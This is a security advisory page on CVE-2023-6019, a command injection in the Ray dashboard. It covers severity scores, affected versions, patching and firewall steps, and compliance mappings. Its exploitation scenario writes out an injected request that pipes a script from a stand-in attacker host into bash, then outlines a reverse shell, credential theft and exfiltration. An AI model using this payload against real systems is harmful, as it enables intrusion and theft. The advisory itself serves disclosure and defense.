CVE-2023-6019 — CRITICAL (CVSS 9.8) AI Security Vulnerability

CISO Take

An unauthenticated attacker with network access to the Ray dashboard (port 8265) can execute arbitrary OS commands on your ML cluster head node with zero prerequisites. With an EPSS of 0.887, this is near-certain to be exploited in the wild — patch to Ray 2.8.1 immediately or firewall the dashboard. Any Ray cluster reachable from untrusted networks is fully compromised until remediated.

Risk Assessment

Severity is maximum for any organization running Ray. CVSS 9.8 combined with EPSS 0.887 places this in the top tier of exploitability — no authentication, no user interaction, network-accessible attack vector. Ray head nodes typically hold GPU credentials, cloud IAM tokens, training data access, and model artifacts, making post-exploitation blast radius extremely high. Exposure risk is elevated because ML engineers routinely expose Ray dashboards on internal networks or even public cloud IPs without additional auth layers.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
ray	pip	< 2.8.1	`2.8.1`
42.4K OpenSSF 6.2 845 dependents Pushed 6d ago 78% patched ~186d to patch Full package profile →

Do you use ray? You're affected.

Severity & Risk

CVSS 3.1

9.8 / 10

EPSS

88.8%

chance of exploitation in 30 days

Higher than 100% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ Public PoC indexed (trickest/cve)

○ EPSS exploit prediction: 89%

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI None

S Unchanged

C High

I High

A High

Recommended Action

5 steps

PATCH

Upgrade Ray to >= 2.8.1 immediately (pip install 'ray>=2.8.1').
NETWORK

If patching is not immediately possible, block all external access to Ray dashboard (default port 8265) and GCS server (port 6379) via firewall or security group rules — restrict to trusted internal CIDR only.
AUTH PROXY

Place Ray dashboard behind an authenticating reverse proxy (e.g., OAuth2 Proxy, Nginx + htpasswd) as a defense-in-depth measure even post-patch.
DETECT

Monitor for anomalous process spawning from the Ray dashboard process (PID tree analysis), unusual outbound connections from Ray head nodes, and unexpected credential access in cloud provider audit logs.
AUDIT

Review cloud IAM roles attached to Ray head node instances and apply least privilege — assume credentials were compromised if running vulnerable versions in any networked environment.

Classification

Code Execution Auth Bypass Supply Chain Framework Inference Training Data AML.T0006 - Active Scanning AML.T0025 - Exfiltration via Cyber Means AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0055 - Unsecured Credentials AML.T0072 - Reverse Shell

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system

ISO 42001

A.6.2.3 - Vulnerability and patch management for AI lifecycle A.9.3 - Information security for AI systems

NIST AI RMF

GOVERN 1.4 - Organizational teams committed to AI risk management MANAGE 2.2 - Mechanisms exist to sustain appropriate responses to AI risks

OWASP LLM Top 10

LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2023-6019?

An unauthenticated attacker with network access to the Ray dashboard (port 8265) can execute arbitrary OS commands on your ML cluster head node with zero prerequisites. With an EPSS of 0.887, this is near-certain to be exploited in the wild — patch to Ray 2.8.1 immediately or firewall the dashboard. Any Ray cluster reachable from untrusted networks is fully compromised until remediated.

Is CVE-2023-6019 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2023-6019, increasing the risk of exploitation.

How to fix CVE-2023-6019?

1. PATCH: Upgrade Ray to >= 2.8.1 immediately (`pip install 'ray>=2.8.1'`). 2. NETWORK: If patching is not immediately possible, block all external access to Ray dashboard (default port 8265) and GCS server (port 6379) via firewall or security group rules — restrict to trusted internal CIDR only. 3. AUTH PROXY: Place Ray dashboard behind an authenticating reverse proxy (e.g., OAuth2 Proxy, Nginx + htpasswd) as a defense-in-depth measure even post-patch. 4. DETECT: Monitor for anomalous process spawning from the Ray dashboard process (PID tree analysis), unusual outbound connections from Ray head nodes, and unexpected credential access in cloud provider audit logs. 5. AUDIT: Review cloud IAM roles attached to Ray head node instances and apply least privilege — assume credentials were compromised if running vulnerable versions in any networked environment.

What systems are affected by CVE-2023-6019?

This vulnerability affects the following AI/ML architecture patterns: distributed training pipelines, model serving, MLOps platforms, hyperparameter optimization pipelines, AI/ML compute clusters.

What is the CVSS score for CVE-2023-6019?

CVE-2023-6019 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 88.77%.

Technical Details

NVD Description

A command injection exists in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication.

Exploitation Scenario

Attacker scans for exposed Ray dashboards on port 8265 (trivially discoverable via Shodan or internal network scan). Sends a crafted GET request to the `/cpu_profile` endpoint with a command injection payload in the `ip` parameter — e.g., `GET /cpu_profile?ip=127.0.0.1;curl+attacker.com/shell.sh|bash`. No authentication token, API key, or session cookie required. The dashboard executes the OS command in the context of the Ray process (often running as root or a privileged service account). Attacker establishes a reverse shell on the head node, extracts cloud credentials from instance metadata (AWS IMDSv1, GCP metadata endpoint), pivots to all Ray worker nodes, exfiltrates model weights and training datasets, and optionally injects poisoned code into the training pipeline for persistent access or model integrity compromise.